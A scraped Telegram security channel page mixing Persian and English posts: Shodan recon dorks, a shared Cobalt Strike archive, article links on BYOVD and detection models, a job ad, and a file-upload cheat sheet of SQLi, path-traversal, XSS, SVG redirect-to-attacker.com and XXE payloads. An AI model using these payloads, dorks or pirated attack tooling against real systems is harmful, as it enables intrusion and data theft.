Network Security Channel – Telegram
Network Security Channel
2.55K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
آموزش استفاده از GPT4-o
رایگان
صدرصد

به یک فیلترشکن با ip آمریکا وصل بشید
و به لینک زیر برید

https://openai.com/index/gpt-4o-and-more-tools-to-chatgpt-free/

در شبیه سازی حملات هک بسیار مفید است

It is very useful in simulating hacking attacks

@Engineer_Computer
👍5🎉1
گفتن اینکه حریم خصوصی بی فایده است زیرا چیزی برای پنهان کردن ندارید مانند این است که بگویید آزادی بیان بی فایده است زیرا چیزی برای گفتن ندارید

Saying that privacy is useless because you have nothing to hide is like saying that freedom of speech is useless because you have nothing to say.

@Engineer_Computer
5🔥3👍1
shodan dorks for recon :

1. ssl.cert.subject.CN:"*.target.com" http.noscript:"index of/"

2. ssl.cert.subject.CN:"*.target.com" http.noscript:"gitlab"

3. ssl.cert.subject.CN:"*. target.com" http.noscript:"gitlab"

4. ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"

5. ssl.cert.subject.CN:"*. target.com" +200 http.noscript:"Admin"

@Engineer_Computer
👍1
Cobalt_Strike_v4.9.1.7z
68.9 MB
CS491
cobalt strike
یکی از ابزار های بشدت قدرتمند در حوزه رد تیم که نیازه🔥
@Engineer_Computer
#redteam
SOC Threat Intelligence Analyst
Telecommute/home-based, Seeking a SOC Threat Intelligence Analyst for a contract role with a State Government organization in Des Moines, IA. Kindly review and let me know if you are interested in this opportunity. Role: SOC Threat Intelligence Analyst Location: Des Moines, IA - Remote Duration: Contractual Position Summary: This position supports the organization's Security Operations Center (SOC). The purpose of this p

http://jobview.monster.com/SOC-Threat-Intelligence-Analyst-Job-US-275907401.aspx

#US #SOC Threat Intelligence Analyst
@Engineer_Computer
استفاده از درایور های آسیب پذیر ولی امضا دار برای دورزدن کنترل های امنیتی نظیر EDR

مقاله ای خواندنی 👌

https://medium.com/@merasor07/byovd-a-kernel-attack-stealthy-threat-to-endpoint-security-ec809272e505

@Engineer_Computer
مقاله ی صبح شنبه
دیتا مدل های کشف
کاهش خطا در تحلیل های امنیتی

**حتی CrowdStrike هم ممکن است در تحلیل و ارائه رول برای کشف اشتباه کند . لذا چه کنیم که دچار خطا نشویم ؟


https://medium.com/@vanvleet/improving-threat-identification-with-detection-data-models-1cad2f8ce051

@Engineer_Computer
The Way to Android Root: Exploiting Your GPU On Smartphone (#CVE-2024-23380)
@Engineer_Computer
Chaining Vulnerabilities through File Upload

SLQi
'sleep(20).jpg
sleep(25)-- -.jpg


Path traversal
../../etc/passwd/logo.png
../../../logo.png


XSS
->  Set file name filename="noscript onload=alert(document.domain)>" , filename="58832_300x300.jpg<noscript onload=confirm()>"

-> Upload using .gif file
GIF89a/<noscript/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .noscript file
<noscript xmlns="w3.org/2000/noscript" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE noscript PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><noscript version="1.1" baseProfile="full" xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<noscript type="text/javanoscript">
alert("HolyBugx XSS");
</noscript>
</noscript>


Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<noscript
onload="window.location='attacker.com'"
xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</noscript>
</code>

XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<noscript width="500px" height="500px" xmlns="w3.org/2000/noscript" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</noscript>

@Engineer_Computer
⭕️ استفاده از مدل‌های Large Language Models (LLMs) در کشف آسیب پذیری‌ها به شکل چشمگیری امنیت سایبری را متحول می‌کند، با خودکارسازی شناسایی آسیب‌پذیری‌ها، بهبود تحلیل تهدیدها. این مدل‌های پیشرفته، مانند GPT-4، به طور قابل توجهی بهره‌وری را با اسکن سریع کد، Generating Test Cases و ارائه گزارش‌های دقیق از آسیب‌پذیری‌ها بهبود می‌بخشند.
توانایی آن‌ها در پردازش و تحلیل حجم عظیمی از داده‌ها به متخصصان امنیت کمک می‌کند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLM‌ها در برنامه‌های Bug Bounty نه تنها شناسایی نقص‌های امنیتی را تسریع می‌کند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت می‌کند.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/

The use of Large Language Models (LLMs) in vulnerability discovery will dramatically revolutionize cyber security by automating vulnerability detection and improving threat analysis. These advanced models, such as GPT-4, significantly improve productivity by quickly scanning code, generating test cases, and providing detailed reports of vulnerabilities.
Their ability to process and analyze massive amounts of data helps security professionals identify and fix potential vulnerabilities more effectively. Integrating LLMs into Bug Bounty programs not only accelerates the detection of security flaws, but also optimizes the overall threat detection process and, as a result, strengthens the defense against evolving cyber threats.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
#LLM
@Engineer_Computer
👍21
MITRE research firm reveals alarming details about a recent cyber attack that dates back to late 2023.
Adversary used backdoors, web shells, and credential harvesting to breach VMware infrastructure.
🔗 Read details:
https://thehackernews.com/2024/05/china-linked-hackers-used-rootrot.html

@Engineer_Computer
👍1